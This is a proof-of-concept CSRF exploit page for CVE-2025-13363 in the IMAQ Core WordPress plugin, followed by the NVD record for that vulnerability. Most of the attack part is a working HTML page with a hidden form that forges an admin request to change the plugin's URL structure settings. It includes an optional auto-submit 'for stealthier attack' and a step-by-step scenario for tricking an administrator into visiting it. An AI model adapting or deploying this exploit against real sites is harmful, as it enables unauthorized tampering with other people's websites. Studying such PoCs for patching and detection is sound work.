CVE-2025-13363

<!-- CSRF PoC for CVE-2025-13363 --> <!-- Target: WordPress site with IMAQ Core plugin <= 1.2.1 --> <!-- This PoC demonstrates how an attacker can change the plugin's URL structure settings --> <!DOCTYPE html> <html> <head> <title>CVE-2025-13363 CSRF PoC</title> </head> <body> <h1>IMAQ Core Plugin CSRF Attack</h1> <p>Click the button below to execute the CSRF attack:</p> <!-- Auto-submit form that forges a request to update URL structure settings --> <form id="csrfForm" action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- IMAQ Core plugin's URL structure update parameters --> <input type="hidden" name="action" value="academix_core_permalink_update"> <input type="hidden" name="academix_permalink" value="malicious-url-structure"> <input type="hidden" name="academix_permalink_nonce" value=""> </form> <button onclick="document.getElementById('csrfForm').submit();">Execute Attack</button> <script> // Auto-submit after page load (for stealthier attack) // window.onload = function() { document.getElementById('csrfForm').submit(); }; </script> </body> </html> <!-- Attack Scenario: 1. Attacker creates a malicious page with the above form 2. Attacker tricks WordPress admin into visiting the page 3. Admin's browser sends authenticated request with modified parameters 4. Server processes the request without nonce validation 5. Plugin's URL structure settings are modified -->

{"cve": {"id": "CVE-2025-13363", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:41.490", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The IMAQ Core plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the URL structure settings update functionality. This makes it possible for unauthenticated attackers to update the plugin's URL structure settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/imaq-core/tags/1.2.1/libs/AcademixCorePermalink.php#L58", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/imaq-core/trunk/libs/AcademixCorePermalink.php#L58", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/684de9c5-6f94-455d-b095-9f2df733ab95?source=cve", "source": "[email protected]"}]}}